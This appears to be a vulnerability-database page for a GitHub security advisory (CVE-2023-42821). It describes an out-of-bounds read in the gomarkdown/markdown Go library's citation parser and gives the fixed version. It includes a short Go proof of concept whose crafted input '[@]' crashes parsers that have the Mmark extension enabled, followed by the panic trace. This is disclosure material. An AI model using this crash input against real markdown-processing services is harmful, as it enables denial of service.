GHSA-M9XQ-6H2J-65R2

Vulnerability from github – Published: 2023-09-22 19:59 – Updated: 2023-09-27 13:55
VLAI?
Summary
Markdown vulnerable to Out-of-bounds Read while parsing citations
Details

Summary

Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.

Details

To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the citation.go file on the line 69 when the parser tries to access the element past its length.

https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69

PoC

package main

import (
    "github.com/gomarkdown/markdown"
    "github.com/gomarkdown/markdown/parser"
)

func main() {
    ext := parser.CommonExtensions |
        parser.Attributes |
        parser.OrderedListStart |
        parser.SuperSubscript |
        parser.Mmark
    p := parser.NewWithExtensions(ext)

    inp := []byte("[@]")
    markdown.ToHTML(inp, p, nil)
}

$ go run main.go
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:38 +0xb8
github.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/parser.go:307 +0x8c
github.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:574 +0x38
github.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0})
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:546 +0x58
github.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0})
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:557 +0x144
github.com/gomarkdown/markdown/ast.WalkFunc(...)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:580
github.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?})
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/parser.go:304 +0x16c
github.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?)
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/markdown.go:53 +0x6c
github.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0})
    /Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/markdown.go:77 +0x30
main.main()
    /Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c
exit status 2

Impact

Denial of Service / panic

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gomarkdown/markdown"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20230922105210-14b16010c2ee"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-42821"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-09-22T19:59:49Z",
    "nvd_published_at": "2023-09-22T17:15:14Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nParsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.\n\n### Details\nTo exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length.\n\nhttps://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69\n\n### PoC\n```go\npackage main\n\nimport (\n\t\"github.com/gomarkdown/markdown\"\n\t\"github.com/gomarkdown/markdown/parser\"\n)\n\nfunc main() {\n\text := parser.CommonExtensions |\n\t\tparser.Attributes |\n\t\tparser.OrderedListStart |\n\t\tparser.SuperSubscript |\n\t\tparser.Mmark\n\tp := parser.NewWithExtensions(ext)\n\n\tinp := []byte(\"[@]\")\n\tmarkdown.ToHTML(inp, p, nil)\n}\n```\n\n```bash\n$ go run main.go\npanic: runtime error: index out of range [1] with length 1\n\ngoroutine 1 [running]:\ngithub.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/citation.go:69 +0x544\ngithub.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:308 +0x1c0\ngithub.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/inline.go:38 +0xb8\ngithub.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/parser.go:307 +0x8c\ngithub.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:574 +0x38\ngithub.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0})\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:546 +0x58\ngithub.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0})\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:557 +0x144\ngithub.com/gomarkdown/markdown/ast.WalkFunc(...)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/ast/node.go:580\ngithub.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?})\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/parser/parser.go:304 +0x16c\ngithub.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?)\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/markdown.go:53 +0x6c\ngithub.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0})\n\t/Users/demon/go/pkg/mod/github.com/gomarkdown/markdown@v0.0.0-20230916125811-7478c230c7cd/markdown.go:77 +0x30\nmain.main()\n\t/Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c\nexit status 2\n```\n\n### Impact\nDenial of Service / panic\n",
  "id": "GHSA-m9xq-6h2j-65r2",
  "modified": "2023-09-27T13:55:11Z",
  "published": "2023-09-22T19:59:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gomarkdown/markdown/security/advisories/GHSA-m9xq-6h2j-65r2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42821"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gomarkdown/markdown/commit/14b16010c2ee7ff33a940a541d993bd043a88940"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gomarkdown/markdown"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Markdown vulnerable to Out-of-bounds Read while parsing citations"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.